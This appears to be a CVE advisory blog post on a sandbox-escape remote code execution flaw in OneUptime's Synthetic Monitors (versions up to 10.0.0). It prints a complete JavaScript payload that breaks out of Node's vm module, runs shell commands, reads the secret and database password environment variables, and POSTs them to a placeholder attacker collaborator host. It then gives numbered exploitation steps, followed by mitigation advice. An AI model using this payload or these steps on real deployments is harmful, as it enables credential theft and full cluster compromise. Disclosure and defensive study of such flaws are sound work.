OneUptime, Remote Code Execution via Sandbox Escape (Critical)

Listen to this Post

The vulnerability in OneUptime stems from the insecure use of Node.js’s `vm` module to execute untrusted JavaScript code in Synthetic Monitors. The `vm` module is explicitly documented by Node.js as not being a security boundary, yet OneUptime uses `vm.runInContext()` in `Common/Server/Utils/VM/VMRunner.ts` to run user-supplied Playwright scripts. An attacker with project member permissions can inject a payload leveraging prototype chain escape: this.constructor.constructor('return process')(). This returns the host’s native `process` object, allowing access to `child_process` via proc.mainModule.require('child_process'). With this, arbitrary system commands can be executed on the `oneuptime-probe` container. The probe container holds sensitive environment variables (e.g., ONEUPTIME_SECRET, DATABASE_PASSWORD), which can be exfiltrated to an external server using the native `http` module. This leads to complete cluster compromise. The exploit is triggered through the OneUptime dashboard by creating a Synthetic Monitor with malicious code. No proper isolation like `isolated-vm` or AST filtering is applied, making the attack straightforward. Versions <= 10.0.0 are impacted, and open registration by default allows unauthenticated attackers to create accounts and projects, escalating the risk.

dailycve form:

Platform: OneUptime
Version: <= 10.0.0
Vulnerability: RCE Code Injection
Severity: Critical
date: March 7, 2026

Prediction: No patch yet

What Undercode Say:

Showing bash commands and codes related to the blog

// Malicious JavaScript payload for Synthetic Monitor
return new Promise((resolve) => {
try {
const proc = this.constructor.constructor('return process')();
const cp = proc.mainModule.require('child_process');
const output = cp.execSync('ls -la /usr/src/app').toString();
const secret = proc.env.ONEUPTIME_SECRET;
const db_pass = proc.env.DATABASE_PASSWORD;
const http_real = proc.mainModule.require('http');
const req = http_real.request({
hostname: 'YOUR_OAST_OR_BURP_COLLABORATOR_URL_HERE',
port: 80,
path: '/',
method: 'POST'
}, (res) => {
resolve("EXFILTRATION_STATUS: " + res.statusCode);
});
req.on('error', (e) => resolve("EXFILTRATION_ERROR: " + e.message));
const payloadData = JSON.stringify({ rce_output: output, secret: secret, db: db_pass });
req.write(payloadData);
req.end();
} catch(e) {
resolve("CRITICAL_ERROR: " + e.message);
}
});

How Exploit:

  1. Log in to OneUptime dashboard (open registration enabled by default).
  2. Navigate to Monitors > Create New Monitor > Synthetic Monitor.

3. Select Chromium and Desktop for browser/screen settings.

  1. Replace default Playwright code with the malicious payload, updating the exfiltration URL.
  2. Save the monitor; within 60 seconds, the probe executes the code, sending RCE output and environment secrets to the attacker’s server.

Protection from this CVE:

  • Disable open registration to prevent unauthenticated account creation.
  • Replace `vm` module with secure isolation like `isolated-vm` or run untrusted code in separate containers.
  • Apply strict input validation and AST filtering on user-supplied scripts.
  • Monitor for patch updates from OneUptime and upgrade immediately when available.

Impact:

Remote Code Execution (RCE) allows attackers to execute arbitrary system commands on the `oneuptime-probe` container. With access to environment variables containing database and cluster credentials, an attacker can exfiltrate secrets, leading to full cluster compromise. All OneUptime deployments running version <= 10.0.0 are affected, and due to open registration, external unauthenticated users can exploit this vulnerability.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top